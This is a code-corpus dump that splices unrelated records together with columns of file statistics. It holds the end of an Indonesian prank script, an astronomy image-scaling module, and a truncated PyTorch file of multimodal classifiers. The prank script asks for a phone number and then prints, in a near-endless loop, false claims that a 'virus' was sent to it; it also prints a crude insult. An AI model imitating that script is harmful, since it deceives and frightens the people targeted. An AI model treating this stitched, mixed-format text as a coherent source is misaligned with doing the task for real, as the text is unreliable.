ketik("")
# Prompt for a phone number and a yes/no confirmation; Ctrl-C / EOF exits.
try:
    isi = input(p +" ➣"+ k +" Masukan Nomer "+ m +": "+ i)
    mulai = input(p +" ➣"+ k +" Lanjut?"+ i +" y"+ k +"/"+ m +"t "+ m +": "+ i)
    print("")
    print("")
except (KeyboardInterrupt,EOFError):
    ketik (m +' !'+ p +' BAY KONTOL!!')
    sys.exit()
if mulai == "y":
    # Prank mode: nothing is actually sent; the loop only prints a message.
    print(m +" !"+ k +" Virus"+ p +" Sedang Di Siapkan")
    time.sleep(2)
    print("")
    # NOTE(review): this bound is astronomically large, so the loop below is
    # effectively endless; the loop variable also rebinds the color variable
    # `i` defined earlier -- confirm both are intentional.
    ulang = 1000000000000000000000000000000000000000000000000
    for i in range(ulang):
        time.sleep(0.01)
        print ("\033[1;32m ✓{} Berhasil Mengirim{} Virus{} Ke Nomor >{} {}".format(p, m, p, k, isi))
elif mulai == "t":
    print (m +" !"+ p +" program berhenti")
else:
    # Any answer other than "y"/"t" is treated as unavailable.
    print (m +" !"+ p +" tidak tersedia")
| 2.936254
| 111
| 0.500203
| 1,993
| 17,227
| 4.323131
| 0.063221
| 0.891017
| 1.285515
| 1.779944
| 0.893106
| 0.891017
| 0.891017
| 0.891017
| 0.891017
| 0.891017
| 0
| 0.021359
| 0.415685
| 17,227
| 5,866
| 112
| 2.936754
| 0.833996
| 0.495153
| 0
| 0.076923
| 0
| 0
| 0.105813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.030769
| 0
| 0.046154
| 0.107692
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
869cfc51ce16c38bdf09886876680ec614676ded
| 6,567
|
py
|
Python
|
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Written by Min-Su Shin
# Department of Astrophysical Sciences, Princeton University
#
# You can freely use the code.
#
import numpy
import math
def sky_median_sig_clip(input_arr, sig_fract, percent_fract, max_iter=100):
    """Estimate the sky level by iterative sigma-clipping around the median.

    @type input_arr: numpy array
    @param input_arr: image data array
    @type sig_fract: float
    @param sig_fract: fraction of sigma clipping
    @type percent_fract: float
    @param percent_fract: convergence fraction
    @type max_iter: max. of iterations
    @rtype: tuple
    @return: (sky value, number of iteration)
    """
    data = numpy.ravel(input_arr)
    previous_sky = numpy.median(data)
    spread = data.std()
    keep = numpy.where(
        (data < previous_sky + sig_fract * spread)
        & (data > previous_sky - sig_fract * spread)
    )
    data = data[keep]
    current_sky = numpy.median(data)
    iteration = 0
    # Re-clip until the median changes by less than percent_fract (relative)
    # or the iteration budget runs out.
    while (
        (math.fabs(previous_sky - current_sky) / current_sky) > percent_fract
    ) and (iteration < max_iter):
        iteration += 1
        previous_sky = current_sky
        spread = data.std()
        keep = numpy.where(
            (data < previous_sky + sig_fract * spread)
            & (data > previous_sky - sig_fract * spread)
        )
        data = data[keep]
        current_sky = numpy.median(data)
    return (current_sky, iteration)
def sky_mean_sig_clip(input_arr, sig_fract, percent_fract, max_iter=100):
    """Estimate the sky level by iterative sigma-clipping around the mean.

    @type input_arr: numpy array
    @param input_arr: image data array
    @type sig_fract: float
    @param sig_fract: fraction of sigma clipping
    @type percent_fract: float
    @param percent_fract: convergence fraction
    @type max_iter: max. of iterations
    @rtype: tuple
    @return: (sky value, number of iteration)
    """
    data = numpy.ravel(input_arr)
    previous_sky = numpy.mean(data)
    spread = data.std()
    keep = numpy.where(
        (data < previous_sky + sig_fract * spread)
        & (data > previous_sky - sig_fract * spread)
    )
    data = data[keep]
    current_sky = numpy.mean(data)
    iteration = 0
    # Re-clip until the mean changes by less than percent_fract (relative)
    # or the iteration budget runs out.
    while (
        (math.fabs(previous_sky - current_sky) / current_sky) > percent_fract
    ) and (iteration < max_iter):
        iteration += 1
        previous_sky = current_sky
        spread = data.std()
        keep = numpy.where(
            (data < previous_sky + sig_fract * spread)
            & (data > previous_sky - sig_fract * spread)
        )
        data = data[keep]
        current_sky = numpy.mean(data)
    return (current_sky, iteration)
def linear(inputArray, scale_min=None, scale_max=None):
    """Performs linear scaling of the input numpy array.

    @type inputArray: numpy array
    @param inputArray: image data array
    @type scale_min: float
    @param scale_min: minimum data value (defaults to the array minimum)
    @type scale_max: float
    @param scale_max: maximum data value (defaults to the array maximum)
    @rtype: numpy array
    @return: image data array scaled into the [0, 1] range
    """
    imageData = numpy.array(inputArray, copy=True)
    # PEP 8: compare to None with `is`, not `==`.
    if scale_min is None:
        scale_min = imageData.min()
    if scale_max is None:
        scale_max = imageData.max()
    # clip() already bounds the data to [scale_min, scale_max], so after the
    # linear mapping every value lies in [0, 1]; the old post-hoc
    # numpy.where clamping was redundant and has been removed.
    # NOTE(review): scale_max == scale_min still triggers a divide-by-zero
    # warning, unchanged from the original behavior.
    imageData = imageData.clip(min=scale_min, max=scale_max)
    imageData = (imageData - scale_min) / (scale_max - scale_min)
    return imageData
def sqrt(inputArray, scale_min=None, scale_max=None):
    """Performs sqrt scaling of the input numpy array.

    @type inputArray: numpy array
    @param inputArray: image data array
    @type scale_min: float
    @param scale_min: minimum data value (defaults to the array minimum)
    @type scale_max: float
    @param scale_max: maximum data value (defaults to the array maximum)
    @rtype: numpy array
    @return: image data array scaled into the [0, 1] range
    """
    imageData = numpy.array(inputArray, copy=True)
    # PEP 8: compare to None with `is`, not `==`.
    if scale_min is None:
        scale_min = imageData.min()
    if scale_max is None:
        scale_max = imageData.max()
    # After clip() the shifted data is guaranteed non-negative, so the old
    # numpy.where zero-fill before the square root was redundant.
    imageData = imageData.clip(min=scale_min, max=scale_max)
    imageData = imageData - scale_min
    imageData = numpy.sqrt(imageData)
    # NOTE(review): scale_max == scale_min still yields a division by zero,
    # unchanged from the original behavior.
    imageData = imageData / math.sqrt(scale_max - scale_min)
    return imageData
def log(inputArray, scale_min=None, scale_max=None):
    """Performs log10 scaling of the input numpy array.

    @type inputArray: numpy array
    @param inputArray: image data array
    @type scale_min: float
    @param scale_min: minimum data value (defaults to the array minimum)
    @type scale_max: float
    @param scale_max: maximum data value (defaults to the array maximum)
    @rtype: numpy array
    @return: image data array; values below scale_min map to 0.0, values
        above scale_max map to 1.0
    """
    imageData = numpy.array(inputArray, copy=True)
    # PEP 8: compare to None with `is`, not `==`.
    if scale_min is None:
        scale_min = imageData.min()
    if scale_max is None:
        scale_max = imageData.max()
    factor = math.log10(scale_max - scale_min)
    below = numpy.where(imageData < scale_min)
    inside = numpy.where((imageData >= scale_min) & (imageData <= scale_max))
    above = numpy.where(imageData > scale_max)
    imageData[below] = 0.0
    imageData[above] = 1.0
    # NOTE(review): in-range values <= 0 produce -inf/nan from log10, and an
    # integer input array truncates these assignments -- both quirks are
    # preserved from the original implementation.
    imageData[inside] = numpy.log10(imageData[inside]) / factor
    return imageData
def asinh(inputArray, scale_min=None, scale_max=None, non_linear=2.0):
    """Performs asinh scaling of the input numpy array.

    Values below scale_min map to 0, values above scale_max map to 1,
    in-range values map to asinh((v - scale_min)/non_linear) normalized
    by asinh((scale_max - scale_min)/non_linear).

    @type inputArray: numpy array
    @param inputArray: image data array
    @type scale_min: float
    @param scale_min: minimum data value (defaults to the data minimum)
    @type scale_max: float
    @param scale_max: maximum data value (defaults to the data maximum)
    @type non_linear: float
    @param non_linear: non-linearity factor
    @rtype: numpy array
    @return: image data array
    """
    imageData = numpy.array(inputArray, copy=True)
    # PEP 8: use `is None`, not `== None`.
    if scale_min is None:
        scale_min = imageData.min()
    if scale_max is None:
        scale_max = imageData.max()
    factor = numpy.arcsinh((scale_max - scale_min) / non_linear)
    # Partition before mutating so all masks see the original values.
    indices0 = numpy.where(imageData < scale_min)
    indices1 = numpy.where((imageData >= scale_min) & (imageData <= scale_max))
    indices2 = numpy.where(imageData > scale_max)
    imageData[indices0] = 0.0
    imageData[indices2] = 1.0
    imageData[indices1] = numpy.arcsinh((imageData[indices1] - scale_min) / non_linear) / factor
    return imageData
| 31.123223
| 95
| 0.678392
| 894
| 6,567
| 4.777405
| 0.106264
| 0.061812
| 0.032779
| 0.026223
| 0.86303
| 0.860688
| 0.860688
| 0.841489
| 0.811988
| 0.811988
| 0
| 0.009634
| 0.225522
| 6,567
| 210
| 96
| 31.271429
| 0.830122
| 0.319933
| 0
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.020833
| 0
| 0.145833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86a9fbe39fe1458d24c82d7f01725e3ea5cfc307
| 73,566
|
py
|
Python
|
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | 3
|
2021-02-09T15:44:41.000Z
|
2021-11-02T15:34:11.000Z
|
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | null | null | null |
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import sys
sys.path.insert(0,'.')
import torch
import torch.nn as nn
import torchvision.models as models
import numpy as np
import pdb
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
# Custom fusion modules
from .fusion import *
from .Rs_GCN import *
# import dgl.function as fn
# from dgl.nn.pytorch import edge_softmax, GATConv
"""
Visual Encoder model
"""
def load_model(args, classes_number, embedding_size):
    """Instantiate the model selected by ``args.model``.

    Raises NameError when ``args.model`` does not name a known model.
    """
    common = dict(args=args, num_classes=classes_number, embedding_size=embedding_size)
    builders = {
        'visualNet': lambda: Resnet_CNN(**common),
        'lenet': lambda: Lenet_CNN(**common),
        'baseNet': lambda: BaseNet(**common),
        'fisherNet': lambda: FisherNet(max_textual=1, reduced_size=512, **common),
        'orig_fisherNet': lambda: Orig_FisherNet(max_textual=1, reduced_size=512, **common),
        'TextNet': lambda: TextNet(reduced_size=512, **common),
        'globalNet': lambda: globalNet(**common),
        'baseGCN': lambda: baseGCN(**common),
        'textGCN': lambda: textGCN(**common),
        'fullGCN': lambda: fullGCN(**common),
        'fullGCN_attn': lambda: fullGCN_attn(**common),
        'dualGCN': lambda: dualGCN(**common),
        'fullGCN_bboxes': lambda: fullGCN_bboxes(**common),
        'GAT_bboxes': lambda: GAT_bboxes(**common),
        'transformer_net': lambda: transformer_net(**common),
    }
    builder = builders.get(args.model)
    if builder is None:
        raise NameError(args.model + ' not implemented!')
    return builder()
class AttentionModel(nn.Module):
    """Spatial self-attention over a 2048-channel feature map.

    Scores every spatial position with two 1x1 convolutions, softmaxes
    the scores over all positions, and returns the input enriched by its
    attended version (x + x * mask) together with the mask itself.
    """

    def __init__(self, hidden_layer=380):
        super(AttentionModel, self).__init__()
        self.attn_hidden_layer = hidden_layer
        # 2048 -> hidden -> 1 score per spatial location.
        self.net = nn.Sequential(
            nn.Conv2d(2048, self.attn_hidden_layer, kernel_size=1),
            nn.Conv2d(self.attn_hidden_layer, 1, kernel_size=1),
        )

    def forward(self, x):
        batch = x.size(0)
        scores = self.net(x)                    # BS x 1 x H x W
        flat_scores = scores.view(batch, -1)
        weights = nn.Softmax(dim=1)(flat_scores)  # normalized over H*W
        weights = weights.view(batch, 1, x.size(2), x.size(3))
        attended = x * weights
        return x + attended, weights
class Lenet_CNN(nn.Module):
    """GoogLeNet visual encoder fused with word-embedding textual features
    via a semantic attention mechanism, followed by a linear classifier.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True):
        super(Lenet_CNN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        lenet = models.googlenet(pretrained)
        # Freeze the entire backbone; only the heads below are trained.
        for name, child in lenet.named_children():
            for param in child.parameters():
                param.requires_grad = False
        # Drop the final classification layer of GoogLeNet.
        self.cnn_features = nn.Sequential(*list(lenet.children())[:-1])
        # Initial Vf (visual-feature head)
        self.bn_vf = nn.BatchNorm1d(1024)
        self.fc_vf = nn.Linear(1024, 1024)
        # Initial Tf (textual-feature head; 15 = expected number of tokens)
        self.bn_tf = nn.BatchNorm1d(15)
        self.fc_tf = nn.Linear(300, 300)
        # Semantic Attention Weights (visual -> embedding space)
        self.bn_w = nn.BatchNorm1d(1024)
        self.fc_w = nn.Linear(1024, 300, bias=False)
        # Reshape Visual Features Before Concat
        self.bn1 = nn.BatchNorm1d(1024)
        self.fc1 = nn.Linear(1024, 512)
        # LAST LAYERS (classifier over concatenated modalities)
        self.bn_clf = nn.BatchNorm1d(512 + 300)
        self.fc_clf = nn.Linear(512 + 300, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, 0, 0).

        local_features, text_bboxes and local_bboxes are accepted for
        interface compatibility with the other models but are unused here.
        """
        vf = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        # NOTE(review): the comment above is inherited; the view below
        # assumes a 1024-d pooled feature per sample — confirm backbone output.
        vf = vf.view(sample_size, 1024)
        vf = F.leaky_relu(self.fc_vf(self.bn_vf(vf)))
        textual_features = F.leaky_relu(self.fc_tf(self.bn_tf(textual_features)))
        # Score the projected visual feature against every textual vector.
        wi = self.fc_w(self.bn_w(vf))
        wi = torch.bmm(wi.view(sample_size, 1, 300), textual_features.permute(0, 2, 1))
        wi = torch.tanh(wi)
        wi = F.softmax(wi, dim=2)
        # Attention over textual features
        textual_features = torch.bmm(wi, textual_features)
        # Reshape vf before concat
        vf = self.bn1(vf)
        vf = F.leaky_relu(self.fc1(vf))
        x = torch.cat((textual_features[:, 0, :], vf), 1)
        x = F.dropout(self.fc_clf(self.bn_clf(x)), p=0.3, training=self.training)
        return x, 0, 0
class Resnet_CNN(nn.Module):
    """Visual-only classifier: ResNet-152 features with spatial attention
    and a single linear layer over the flattened 2048x7x7 map.
    """

    def __init__(self, args , num_classes, embedding_size, pretrained=True, attention=True):
        super(Resnet_CNN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                # print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                # print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        # Drop avgpool + fc so the output stays a spatial feature map.
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        #
        #
        # for param in self.cnn_features.parameters():
        # param.requires_grad = False
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
        self.fc1_bn = nn.BatchNorm1d(2048*7*7)
        self.fc1 = nn.Linear(2048*7*7, num_classes)

    def forward(self, im, textual_features, sample_size, local_features):
        """Return (logits, attn_mask). textual_features, sample_size and
        local_features are unused; they exist for interface compatibility.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True;
        # constructing with attention=False makes the return raise NameError.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.relu(self.fc1(self.fc1_bn(x)))
        return x, attn_mask
class BaseNet(nn.Module):
    """ResNet-152 visual encoder with spatial attention, semantic attention
    over textual embeddings, and a configurable multimodal fusion operator.
    """

    def __init__(self, args, num_classes, embedding_size = 300, pretrained=True, attention=True):
        super(BaseNet, self).__init__()
        self.args = args
        self.num_classes = num_classes
        self.pretrained = pretrained
        self.embedding_size = embedding_size
        # Select the fusion operator by name; 'concat' (or any unknown
        # value) leaves self.fusion unset and is handled in forward().
        if self.args.fusion == 'block':
            self.fusion = Block([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'blocktucker':
            self.fusion = BlockTucker([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'tucker':
            self.fusion = Tucker ([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mutan':
            self.fusion = Mutan([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfb':
            self.fusion = MFB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfh':
            self.fusion = MFH([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        # models.densenet169()
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                #print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                #print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        # Drop avgpool + fc so the output stays a spatial feature map.
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        self.fc1 = nn.Linear(100352, 1024)
        self.fc1_bn = nn.BatchNorm1d(1024)
        # Semantic Attention Weights
        self.fc_w = nn.Linear(1024, self.embedding_size, bias=False)
        # LAST LAYERS
        self.bn3 = nn.BatchNorm1d(1024 + self.embedding_size)
        self.fc3 = nn.Linear(1024 + self.embedding_size, num_classes)
        '''
        self.fc3 = nn.Linear(1024 + self.embedding_size, 300)
        # CLASSIF LAYER
        self.bn4 = nn.BatchNorm1d(300)
        self.fc4 = nn.Linear(300, num_classes)
        '''

    def forward(self, im, textual_features, sample_size):
        """Return (logits, attn_mask)."""
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True;
        # attention=False makes the final return raise NameError.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        visual_features = F.relu(self.fc1_bn(self.fc1(x)))  # Visual Features BS x 1024
        x = self.fc_w(visual_features)  # BS x 300 or (embedding size)
        # Score the projected visual feature against each textual embedding.
        x = torch.bmm(x.view(sample_size, 1, self.embedding_size), textual_features.permute(0, 2, 1))
        x = torch.tanh(x)
        x = F.softmax(x, dim=2)
        # Attention over textual features
        x = torch.bmm(x, textual_features)
        # Reshape visual features before fusion
        # Fuse
        if self.args.fusion != 'concat':
            x = self.fusion([x.view(sample_size, -1),visual_features])
        else:
            x = torch.cat((x[:, 0, :], visual_features), 1)
        '''
        ranking_vector = F.relu(self.fc3(self.bn3(x)))
        x = F.dropout(self.fc4(self.bn4(ranking_vector)), p=0.3, training=self.training)
        '''
        x = F.dropout(self.fc3(self.bn3(x)), p=0.3, training=self.training)
        return x, attn_mask
class FisherNet(nn.Module):
    """ResNet-152 visual encoder combined with Fisher-vector textual
    features (dimensionality-reduced through two FC layers) via an
    element-wise gating, then fused and classified.
    """

    def __init__(self, args, num_classes, max_textual = 20, embedding_size = 38400, reduced_size = 512, pretrained=True, attention=True):
        super(FisherNet, self).__init__()
        self.args = args
        self.num_classes = num_classes
        self.pretrained = pretrained
        self.embedding_size = embedding_size
        self.reduced_size = reduced_size
        self.max_textual = max_textual
        # Select the fusion operator by name; 'concat' is handled in forward().
        if self.args.fusion == 'block':
            self.fusion = Block([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'blocktucker':
            self.fusion = BlockTucker([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'tucker':
            self.fusion = Tucker ([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mutan':
            self.fusion = Mutan([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfb':
            self.fusion = MFB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfh':
            self.fusion = MFH([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                #print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                #print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # Reduce Dimensionality of Fisher Vectors
        self.FV_bn1 = nn.BatchNorm1d(embedding_size)
        self.FV_fc1 = nn.Linear(embedding_size, 4096)
        self.FV_bn2 = nn.BatchNorm1d(4096)
        self.FV_fc2 = nn.Linear(4096, reduced_size)
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        self.fc1 = nn.Linear(100352, 1024)
        self.fc1_bn = nn.BatchNorm1d(1024)
        # Semantic Attention Weights
        self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
        # LAST LAYERS
        self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
        self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)

    def forward(self, im, textual_features, sample_size):
        """Return (logits, attn_mask)."""
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        visual_features = F.relu(self.fc1_bn(self.fc1(x)))  # Visual Features BS x 1024
        x = self.fc_w(visual_features)  # BS x 300 or (embedding size)
        # Reduce the Fisher vector to reduced_size via two FC layers.
        textual_features = F.relu(self.FV_fc1(self.FV_bn1(textual_features.view(sample_size, -1))))
        textual_features = F.dropout(F.relu(self.FV_fc2(self.FV_bn2(textual_features))), p=0.5, training=self.training)
        # Element-wise gating between projected visual and textual features.
        x = torch.mul(x, textual_features)
        x = torch.tanh(x)
        x = torch.mul(x, textual_features)
        # Reshape visual features before fusion
        # Fuse
        if self.args.fusion != 'concat':
            x = self.fusion([x.view(sample_size, -1),visual_features])
        else:
            x = torch.cat((x, visual_features), 1)
        x = F.dropout(self.fc3(self.bn3(x)), p=0.5, training=self.training)
        return x, attn_mask
class Orig_FisherNet(nn.Module):
    """Original FisherNet variant: identical architecture to FisherNet but
    with no ReLU on the second Fisher-vector FC layer, a 6-argument forward
    signature, and a 3-tuple return (logits, attn_mask, 0).
    """

    def __init__(self, args, num_classes, max_textual = 20, embedding_size = 38400, reduced_size = 512, pretrained=True, attention=True):
        super(Orig_FisherNet, self).__init__()
        self.args = args
        self.num_classes = num_classes
        self.pretrained = pretrained
        self.embedding_size = embedding_size
        self.reduced_size = reduced_size
        self.max_textual = max_textual
        # Select the fusion operator by name; 'concat' is handled in forward().
        if self.args.fusion == 'block':
            self.fusion = Block([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'blocktucker':
            self.fusion = BlockTucker([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'tucker':
            self.fusion = Tucker ([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mutan':
            self.fusion = Mutan([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfb':
            self.fusion = MFB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfh':
            self.fusion = MFH([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                #print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                #print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # Reduce Dimensionality of Fisher Vectors
        self.FV_bn1 = nn.BatchNorm1d(embedding_size)
        self.FV_fc1 = nn.Linear(embedding_size, 4096)
        self.FV_bn2 = nn.BatchNorm1d(4096)
        self.FV_fc2 = nn.Linear(4096, reduced_size)
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        self.fc1 = nn.Linear(100352, 1024)
        self.fc1_bn = nn.BatchNorm1d(1024)
        # Semantic Attention Weights
        self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
        # LAST LAYERS
        self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
        self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask, 0).

        local_features, text_bboxes and local_bboxes are accepted for
        interface compatibility with the other models but are unused here.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        visual_features = F.relu(self.fc1_bn(self.fc1(x)))  # Visual Features BS x 1024
        x = self.fc_w(visual_features)  # BS x 300 or (embedding size)
        # FISHER FEATURES
        textual_features = F.relu(self.FV_fc1(self.FV_bn1(textual_features.view(sample_size, -1))))
        #textual_features = F.dropout(F.relu(self.FV_fc2(self.FV_bn2(textual_features))), p=0.5, training=self.training)
        # Unlike FisherNet, the second FV projection has no ReLU here.
        textual_features = F.dropout(self.FV_fc2(self.FV_bn2(textual_features)), p=0.5, training=self.training)
        # Element-wise gating between projected visual and textual features.
        x = torch.mul(x, textual_features)
        x = torch.tanh(x)
        x = torch.mul(x, textual_features)
        # Reshape visual features before fusion
        # Fuse
        if self.args.fusion != 'concat':
            x = self.fusion([x.view(sample_size, -1),visual_features])
        else:
            x = torch.cat((x, visual_features), 1)
        x = F.dropout(self.fc3(self.bn3(x)), p=0.5, training=self.training)
        return x, attn_mask, 0
class TextNet(nn.Module):
    """ResNet-152 visual encoder with semantic attention over textual
    features that are first re-projected ("self-learned morphology")
    through two FC layers to reduced_size.
    """

    def __init__(self, args, num_classes, embedding_size = 300, reduced_size=512, pretrained=True, attention=True):
        super(TextNet, self).__init__()
        self.args = args
        self.num_classes = num_classes
        self.pretrained = pretrained
        self.embedding_size = embedding_size
        self.reduced_size = reduced_size
        # Select the fusion operator by name; 'concat' is handled in forward().
        # NOTE(review): fusion operators here are sized with embedding_size,
        # while forward() attends in reduced_size space — verify if a
        # non-concat fusion is ever used with this model.
        if self.args.fusion == 'block':
            self.fusion = Block([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'blocktucker':
            self.fusion = BlockTucker([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'tucker':
            self.fusion = Tucker ([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mutan':
            self.fusion = Mutan([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfb':
            self.fusion = MFB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        elif self.args.fusion == 'mfh':
            self.fusion = MFH([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                #print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                #print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        self.fc1 = nn.Linear(100352, 1024)
        self.fc1_bn = nn.BatchNorm1d(1024)
        # Semantic Attention Weights
        self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
        # LAST LAYERS
